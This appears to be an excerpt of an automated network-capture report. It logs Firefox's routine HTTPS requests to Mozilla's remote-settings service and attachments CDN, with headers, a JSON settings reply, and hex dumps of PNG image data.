2024-07-26 18:11:03 UTC	658	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 3e bf 49 44 41 54 78 da ed 7d 09 78 5b d7 75 26 08 10 00 77 8a bb 36 5b b6 1c bb b6 e3 2c 4d d2 26 9d a4 49 da 34 9d 34 4d d2 ac 9d a4 db b4 d9 66 da 69 9b 76 32 75 32 d3 ec 93 4e e2 45 d6 c2 7d 05 f0 1e f0 00 70 13 77 52 dc 89 7d 07 17 ad 96 64 c9 96 25 5b b2 16 4a 22 89 ed 01 6f ce 39 f7 3d 90 76 1c cf 17 7d 15 6b 77 68 df 8f 02 41 2c ef dd 73 ef 39 ff 39 e7 3f e7 aa 34 d6 d0 d6 f8 37 1c aa ad 29 d8 12 c0 96 00 b6 c6 96 00 b6 04 b0 35 b6 04 b0 25 80 ad b1 25 80 2d 01 6c 8d 2d 01 6c 09 60 6b 6c 09 60 4b 00 5b 63 4b 00 5b 02 f8 d7 18 39 36 1c f0 20 57 90 c7 c6 e7 b3 7f d5 58 03 ca b8 c3 cf a7 11 56 c6 eb fe f5 35 e3 75 be f1 35 17 f9 96 17 00 dc bc ca Data Ascii: PNGIHDRL\>IDATx}x[u&w6[,M&I44Mfiv2u2NE}pwR}d%[J"o9=v}kwhA,s99?47)5%%-l-l`kl`K[cK[96 WXV5u5
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 96 a4 cb ec 8a b2 d2 d7 cd ac b2 f0 85 b0 6c 75 ac 28 5a 1a 51 b6 3e b2 df 45 b6 81 54 d3 a6 58 e3 4d 13 00 ac c4 90 bc d9 71 b9 d1 b2 b5 79 e4 81 13 14 c6 e9 b0 2c e9 b8 45 2d 3f af 12 60 1e fd 2a 9b 57 65 73 6b 04 1c 30 3b 38 c5 9d 11 1c 36 dc 40 28 54 3e 98 67 c6 35 9e 0b d3 da 19 c6 3f d9 c3 68 15 04 59 6c d9 15 4d ea 08 d5 5d 8e 62 b4 41 06 ca 90 2d 79 76 3f 65 8d 41 d6 1e bc 05 04 a0 16 82 bf 38 70 2e ac 7e 9a 4a 3f 3c 80 67 60 d9 ea f8 90 9e 0f e9 cc b8 7e 35 82 57 6d 75 c3 2c ab ad 5e b5 c0 5e 00 4b 3b a4 35 c3 08 32 e4 93 c5 3f 60 5a 55 ec 33 61 21 5b c2 5a 2e ac 33 e1 4f 35 1f ce 31 47 55 96 a8 4a 88 d2 9f 82 39 96 00 7e 1a 7c a6 f2 b1 6a 4b 44 63 5e d4 98 e7 41 96 6a ab 93 9e 0f a9 2d f3 f8 0c 8e 08 5d ad 72 a9 36 78 8b 5f 6b f1 c2 d0 b0 b7 ff Data Ascii: lu(ZQ>ETXMqy,E-?`*Wesk0;86@(T>g5?hYlM]bA-yv?eA8p.~J?<g`~5Wmu,^^K;52?`ZU3a![Z.3O51GUJ9~\|jKDc^Aj-]r6x_k
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 0a d8 bf d8 e0 b9 b7 79 fc e3 fc a4 83 40 cb 2d 98 e5 34 cc 49 12 74 0e 08 00 d4 49 8a d6 f2 35 9a a3 17 25 e9 ac 24 1d 7e 71 e5 9f 27 23 7f de 35 f7 11 c3 d8 3b 9a 07 f7 d6 f5 ee 39 d4 73 df c1 c3 7b 9e e9 de 5b db bf fb 19 fb 7d fb bb 1e 6b 1a f8 40 db d0 ef 9b 46 fe 66 d8 77 20 7c ce 1b 97 ce 93 ea cf 02 a7 78 0a 15 59 2a 9d 4c 89 31 b0 1d 89 74 06 be e2 8c 24 ed 7b f6 ca bd 4f 9a 6b da 9d 05 a6 50 3e 17 01 27 b1 80 f3 e7 f3 7e 66 93 b3 c6 2c 6b 9f d9 af af 27 80 57 a5 22 ee 8a 00 72 e4 00 64 68 43 0c d9 87 fe 3a b8 54 56 f0 42 d1 a5 44 24 47 61 06 d0 3c 08 2e 09 83 12 e4 77 69 7a 22 00 ed ef 3b d4 f3 c4 b1 ab e7 69 8a 6f c0 44 48 c9 54 66 55 4c af 82 fa 46 7b 9b 4e 2d a7 d2 30 71 33 19 e9 e9 e7 ae fe be 7d 7a c7 93 b6 ed f5 c3 db 9b c7 ca db 8e 14 19 Data Ascii: y@-4ItI5%$~q'#5;9s{[}k@Ffw \|xY*L1t${OkP>'~f,k'W"rdhC:TVBD$Ga<.wiz";ioDHTfULF{N-0q3}z
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 93 72 78 bf ca 82 6e 2d 5c 2d 58 14 d8 c1 79 9c ab a8 79 e8 c1 a6 ae 9e 14 6e 41 58 ff c9 14 86 34 e2 49 30 4c 68 0f e0 da 3e 6c 9c a8 6c 73 e5 9b 60 07 cc ab ad 98 45 20 2f 32 a2 e3 f1 1b 55 70 c1 e0 2a 83 b2 b5 33 8e c5 1d 66 d0 54 77 90 5c 94 13 7b 30 41 5d 1e 55 a7 07 05 60 c2 04 3a c8 00 4c 13 4b 62 80 ed ca e7 1c bb 9a 86 7e be f4 32 60 f9 db e9 4c 3a 09 40 13 dd 5c 70 91 ae 90 c7 f4 05 61 6c 7b fd e0 36 90 96 e0 50 c9 19 12 d8 ec 51 cc ba 98 3d 38 9b 02 cc a6 37 17 14 1a 60 12 dc 58 24 5a 9c 65 5a 7a 24 00 f8 46 c4 5a 16 44 bd 2a f9 4f f4 80 43 25 86 ba 8b f3 c3 65 83 44 41 90 4c 00 00 2e e1 d3 b4 36 6f a1 61 e2 81 fa 9e a6 93 2f 5e c6 2b 44 5b 00 16 01 fd f1 f4 2a e0 31 70 eb 7e cb 38 53 d9 e6 01 4b a6 15 9c 1a ab 83 e9 40 ad 8c f4 7c 14 ab 00 65 Data Ascii: rxn-\-XyynAX4I0Lh>lls`E /2Up3fTw\{0A]U`:LKb~2`L:@\pal{6PQ=87`X$ZeZz$FZDOC%eDAL.6oa/^+D[*1p~8SK@\|e
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 7b 9a 07 41 b9 ab 8c 6e 95 85 c0 92 d9 8d c8 12 e0 ac d9 af 32 f9 f4 e6 85 9d 4d d3 6d cf de b8 8a ba 4b 14 53 6b 69 31 79 9b b4 f0 c7 8d 03 a5 c6 09 c6 16 01 15 44 71 63 85 eb 68 cd 86 ec 43 59 d5 c4 12 bc c4 3b da 10 9f 60 32 00 bc d0 39 8f ae bb 19 9d 95 5c 72 e8 72 e0 d3 8c 81 22 db 7c a1 c9 f1 70 cb 50 24 41 b9 84 94 94 8c 27 e0 16 56 c9 61 fc 87 89 48 4d f3 11 f4 ec 4c f3 00 cc d0 0f 00 44 40 a1 08 a6 87 19 ff ec 57 45 a2 77 a8 82 f0 5b 31 00 8b b1 20 d4 7d 18 33 59 d0 1a 61 5e 1c ef e1 c6 ce 52 f6 30 25 82 c3 9b 49 48 a9 6b c4 69 f8 9d f6 91 e2 f6 51 58 7a b9 36 19 b0 e6 db c3 2a de 09 ab 58 6b 8f 68 f9 40 91 29 b8 fd 89 ae 67 c9 35 4d 92 e9 06 f0 0a cb 3f 28 49 7b f6 09 45 bc 83 29 74 98 56 78 65 01 a7 c4 3c 58 a2 4d 46 9c f3 0c a7 83 76 d6 29 dc Data Ascii: {An2MmKSki1yDqchCY;`29\rr"\|pP$A'VaHMLD@WEw[1 }3Ya^R0%IHkiQXz6*Xkh@)g5M?(I{E)tVxe<XMFv)
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 6d 6f 69 dd 60 75 fb 44 45 fd 70 d5 a1 81 6d 87 86 b6 71 c1 42 eb bc 86 f7 a2 c8 5b a7 6a f6 f7 83 a7 ba bd 76 60 47 63 5f 55 63 7f 75 eb 78 71 bb 43 cb 85 b3 02 d0 c8 30 14 33 e9 45 46 4f 65 fb 5c 75 e3 68 4d dd c0 f6 a6 e1 aa a6 a1 b2 86 e1 92 a6 a9 12 53 a8 10 4c a8 61 ba c0 ea 81 39 2d 6c 77 3c d4 34 d9 7c 31 7d 85 4c 52 2a 21 a6 89 12 79 3c 25 3d d6 32 43 18 4c c9 7b 2b e5 7c 9b 24 00 8d 52 de 95 8d ff 81 67 80 49 28 db a2 86 0b 95 1a e6 3e 3d 12 7a 51 22 be a0 b8 26 a5 56 c1 19 5e 4b 49 37 33 a8 dc 27 5f bc 6e 3b f3 92 e9 f4 25 e3 99 4b fc 99 97 8c cf be dc 78 f2 4a d3 a9 6b 86 33 d7 0f 9f 7e 19 99 23 00 7c 10 bb a2 28 c0 87 3b 76 e5 46 e7 d2 29 fe c4 c5 b6 53 af 1c 3a 76 b1 ed b9 eb e6 33 d7 ea 9f 4f bc fb 70 b4 c0 ec d1 0b 9e 8a d6 e1 c7 83 e7 f8 Data Ascii: moi`uDEpmqB[jv`Gc_UcuxqC03EFOe\uhMSLa9-lw<4\|1}LR*!y<%=2CL{+\|$RgI(>=zQ"&V^KI73'_n;%KxJk3~#\|(;vF)S:v3Op
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 09 16 f8 74 4a 9a 4d 4b d3 69 e9 48 5a 1a 96 a4 af 78 5f 28 af 1b 29 e8 f0 ec ac 1f ed 7c e1 f6 4d 82 ad a0 a6 60 79 32 6d fe d1 d6 be f2 8e 39 cc 52 50 94 49 c7 f9 18 cf 39 bf 7d e2 5d ed 43 13 24 7b c6 7f 87 7d 03 3b c6 95 94 76 b5 8c c3 a2 41 28 61 76 6a 79 1f ba 99 42 44 45 14 e3 ca 8e f1 2f f7 cc 9d 25 83 81 c5 07 69 94 37 46 67 cd 23 a5 1d 20 80 c8 ab 04 70 47 b5 dd 77 40 ce 0d b0 c8 9f 7e 43 e8 95 f8 3c fe 9c ce a0 a6 33 02 4b 0f 59 69 3c 31 5b cd 01 95 c9 0b d0 a8 a4 e3 48 65 43 df de 83 3d 8f ec eb 79 f8 a9 ae 87 f6 75 3f 70 e0 f0 23 cf 74 be fb 27 4d 3f 19 f6 dc 62 15 2f a0 fa 53 49 d0 54 b0 e5 ff 7e d0 f1 d8 3e e3 c3 cf 58 1e ab eb 79 f8 40 d7 43 fb bb 1f aa ed db 71 a0 b7 ba 7d 6a 9b 61 ae 5a 08 ee f8 b9 f9 3c 2b 96 11 c1 ca 24 d3 99 04 cc ec Data Ascii: tJMKiHZx_()\|M`y2m9RPI9}]C${};vA(avjyBDE/%i7Fg# pGw@~C<3KYi<1[HeC=yu?p#t'M?b/SIT~>Xy@Cq}jaZ<+$
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 36 17 ca cd 13 28 00 a4 8d 12 0a 30 78 ca 84 79 30 bf 7f d0 31 c8 ea 32 a8 fa 32 b3 92 49 83 fb d6 7a fa c5 b2 ba 3e 62 83 f9 90 bc 4e 55 b4 32 4b c3 1c 60 6a bd aa 6d f2 2f 0e bb 9e 53 60 a8 44 81 2c 80 a1 1f 31 1c 06 1c a1 a6 ec 08 82 11 ca c3 bc ba 3d da 5d 14 40 28 2b 00 c6 0b 92 db 10 98 fd c8 ed 31 06 f4 76 d8 c5 1e 64 c9 59 fc a8 55 89 2d 4a 81 43 37 91 15 50 42 00 66 c0 c9 fc de b1 8b af e0 ca c2 18 04 6a e6 cc 1a a8 85 87 1a 2d 79 fc 0c 25 14 8f aa b8 20 1a 92 ce 05 98 a3 1c b3 bb c0 e2 02 10 f5 51 61 f2 02 73 a6 b0 b2 06 96 65 1c 60 eb 0f 8f 5f de d1 80 95 2d 68 4e 89 e5 90 d7 39 0f a0 be c8 14 dc f1 4c 3f 77 fa fa 75 56 a7 97 11 01 fe df 22 8f e1 0b dd 93 95 1d 13 78 2f d4 ac 83 15 f6 a0 33 6f c5 f2 71 4c ee f3 f3 35 4d 33 ff 38 1e be 40 02 c8 Data Ascii: 6(0xy0122Iz>bNU2K`jm/S`D,1=]@(+1vdYU-JC7PBfj-y% Qase`_-hN9L?wuV"x/3oqL5M38@
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: be 52 b3 4b db 31 bb a7 71 20 9c 61 5a 85 e2 77 62 1c 16 f8 b5 b4 b8 bc a1 71 c7 0d e2 c5 c4 44 22 07 a7 59 82 3a 4d 29 7f 89 b5 59 59 4b c5 62 24 ec e8 8a 34 7c 55 7a 2a f2 fc 8f 83 c7 1f f7 9f fa ee e9 f8 af 77 cd 6b 5a 1d 65 16 ff a3 cd c3 20 fb 6b 32 e2 c2 6c 06 5a a9 b8 b4 b7 6e 4c cf 51 8f 39 2a 6b 60 4d fe 58 90 86 b5 d7 bc db b4 14 c6 38 7b 95 d3 01 b0 41 cb b9 7f c3 e6 3e c7 58 a1 69 24 44 c3 aa 86 b9 e8 b8 9c c1 6e 18 06 17 15 53 62 89 96 dc 2b 4b 70 94 1b 47 fe 7e 02 41 de 2d 16 20 53 26 28 96 ca ac b0 18 7f 72 0d 2b a8 93 19 98 d6 ef 2e 5e 29 05 a0 69 0b 6c 6b 1c fa d6 64 e4 12 55 7b 8b 49 cc 22 64 58 8e 27 43 3e 2e 7c 8e 88 31 bd 54 32 4e d9 74 40 59 98 07 c5 48 07 f5 b7 21 00 95 4c 24 57 f0 3b 53 d8 c5 e3 86 d2 94 e2 28 75 02 d9 7d 68 04 36 Data Ascii: RK1q aZwbqD"Y:M)YYKb$4\|UzwkZe k2lZnLQ9k`MX8{A>Xi$DnSb+KpG~A- S&(r+.^)ilkdU{I"dX'C>.\|1T2Nt@YH!L$W;S(u}h6
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: b5 4f 62 0d 4a 83 ac 5d 2f 65 49 a9 28 5e 29 ca c0 4a 66 1c 61 8d 31 0c b2 a7 32 55 2c 79 a4 8e 99 47 75 dc a2 de b2 98 2f f8 f3 8d c3 ef b7 0c 3d 2f c9 5d 19 d1 6f 23 c7 0d 14 dd 1f 09 47 6a 3a 26 91 05 cc 23 e3 88 78 d4 b2 00 58 48 8e 69 e6 bb 2e 00 56 08 98 ed 36 cf aa 65 b0 6e b6 0b a3 37 80 85 aa db a7 3e d6 3c 70 4a e1 15 63 90 87 fa 16 82 7e ff fa 91 e3 15 75 43 c8 59 83 0f e9 f6 63 c2 96 f7 62 86 d9 1c d6 71 c8 eb 52 db e4 5a df 1c 0b 11 7b 58 03 10 a5 8b 37 79 9e ac 97 b7 97 55 1d b1 42 30 ec 80 89 65 9a b4 2f b1 f4 4c 21 83 ae 37 01 0d ca 4d 94 a9 ba 1a 73 5e 9d 70 01 41 95 d1 a9 36 81 35 5a d4 1a 23 79 c6 68 45 bb e3 81 03 e6 91 24 25 20 63 04 57 e3 e8 d2 00 dc 6a 7e 39 76 5f 4b 7f 11 e7 44 18 dd 81 0a 0d 71 07 56 e5 87 98 00 b0 fa c1 7a f7 59 Data Ascii: ObJ]/eI(^)Jfa12U,yGu/=/]o#Gj:&#xXHi.V6en7><pJc~uCYcbqRZ{X7yUB0e/L!7Ms^pA65Z#yhE$% cWj~9v_KDqVzY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	64232	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2610 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	64231	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 931 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	64240	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 931 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	64244	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/5e1b56db-af05-453a-83ac-7c094f25918d HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	737	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHxI1nP0tf8NItvi9APvKTrs9rHgKASY32_0fSk4YpIOim-UYdXSKoIfIHqWpqy2ZqlbTo4AMvNFN0MMaA x-goog-generation: 1678716175483648 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 8359 x-goog-meta-goog-reserved-file-mtime: 1654282192 x-goog-hash: crc32c=a8GOiQ== x-goog-hash: md5=tfSW2T6L1G50Zbr+gSL65A== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 8359 Server: UploadServer Date: Fri, 26 Jul 2024 03:43:28 GMT Cache-Control: public,max-age=604800 Age: 52055 Last-Modified: Mon, 13 Mar 2023 14:02:55 GMT ETag: "b5f496d93e8bd46e7465bafe8122fae4" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	653	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 20 6e 49 44 41 54 78 da ed 7b 77 54 1c 57 96 be ff fa 9d dd 51 20 74 a4 9b ee 86 06 9a a8 60 8f e4 b4 f6 8c c7 63 af 77 c6 63 7b d6 5e db e3 9c 95 85 24 42 13 9a 20 4b 28 67 0b 49 04 81 c8 20 c9 12 8a 08 94 b3 84 12 88 20 40 48 22 0a 24 44 86 4e 95 ee be f7 aa bb a1 41 e3 09 e7 fc 66 ff a9 77 0a 4e 57 75 d5 ab aa fb dd fb dd f0 6e 3f 03 c2 f8 3f 1d cf 08 22 10 00 10 00 10 86 00 80 00 80 30 04 00 04 00 84 21 00 20 00 20 0c 01 00 01 00 61 08 00 08 00 08 43 00 40 00 40 18 02 00 02 00 c2 10 00 10 00 10 86 00 80 00 80 30 04 00 04 00 84 21 00 20 00 20 0c 01 00 01 00 61 08 00 08 00 08 43 00 40 00 40 18 02 00 02 00 c2 10 00 10 00 10 86 00 80 00 80 30 04 00 04 Data Ascii: PNGIHDRL\ nIDATx{wTWQ t`cwc{^$B K(gI @H"$DNAfwNWun??"0! aC@@0! aC@@0
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: ff 26 48 d4 08 48 fb 1e fa 06 c1 89 ee 83 30 63 88 a0 89 e8 d0 b7 b4 15 5f 4e e4 c8 03 c0 cb 1c df 00 cd ca 43 ca 52 e8 34 f4 8c 64 36 87 5c c1 ca f0 b2 a6 59 c6 c2 b0 36 93 23 6f ce d2 9c dd be b8 5f 02 80 c3 77 a0 f9 47 b4 c1 ca d9 66 e1 c8 eb 10 3b 80 dd a7 ab ff 18 95 fd 9b b8 e2 df 2f 2b 7d 23 b6 e8 b3 c4 5d 77 fb c0 6a 9b 1f 3d 26 7a 38 2c 30 2b 67 03 9e c1 07 f8 d9 68 60 f0 67 2b 6d 41 b7 68 b1 c0 ab 51 bb 7d 17 1d f2 8f 3c e6 1f fa b3 df b7 29 b9 d7 06 8c e8 35 ad 66 27 b3 26 98 d1 04 b3 d1 da ca 72 36 f9 63 54 90 dc b0 5c 38 da 26 31 9a a8 f0 58 66 e0 78 48 58 fe 85 b1 95 d8 74 8d b6 bd a6 85 b5 12 d5 06 33 4b ce c2 9a c4 5a d1 4b d9 54 1a 9d 87 b4 82 b2 d9 0d a2 65 32 15 cb 50 04 7a 72 3e 62 08 02 24 d2 1f 20 f4 6c 13 33 3a 0b 43 3d 9e ae 9c 00 Data Ascii: &HH0c_NCR4d6\Y6#o_wGf;/+}#]wj=&z8,0+gh`g+mAhQ}<)5f'&r6cT\8&1XfxHXt3KZKTe2Pzr>b$ l3:C=
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: f3 c6 ba 4d cb 9f 9d b9 c8 c5 2d da cd 3d c6 c5 2d ca 55 14 ed e9 9d f3 f1 e7 ec f5 5b 18 39 1c ef 61 c6 ac 6d a8 af bf db d0 de f1 b0 be be be ad ad 6d 7c ba e0 04 00 c3 13 25 12 3b 06 c0 41 41 38 12 78 44 c1 6b 8b 32 74 73 f2 03 17 ef f7 5d 74 40 17 51 e2 13 76 54 13 56 e2 13 51 12 18 7e 40 b7 a0 30 70 d1 1e df 05 85 5e a1 fb 83 43 f3 2b 2d 10 97 77 c5 e7 eb ed be a1 7b 51 88 29 fe 24 79 e5 c9 27 6b ce f5 7b 7c b3 d3 67 c9 41 34 c3 73 a1 39 6f 84 26 df 05 f8 60 f3 29 af 59 a9 41 0b f3 82 e6 66 86 cc 4a 46 66 d1 76 3c ed 6c e4 8c db 86 a9 b5 f1 ba 8a 28 f5 cd b5 6f 00 75 0f a9 01 a2 0b 0b c7 10 e5 ed 06 f3 b5 e3 fa 99 37 13 a6 55 c6 e9 6e c5 87 5c 4a 7c 19 8c 97 3b 0f 27 5d 8c 9b 51 11 eb 5f 17 ef 7f 37 d6 b7 25 51 d7 14 af 6b 88 f1 7b 90 38 a5 3e c6 ef Data Ascii: M-=-U[9amm\|%;AA8xDk2ts]t@QvTVQ~@0p^C+-w{Q)$y'k{\|gA4s9o&`)YAfJFfv<l(ou7Un\J\|;']Q_7%Qk{8>
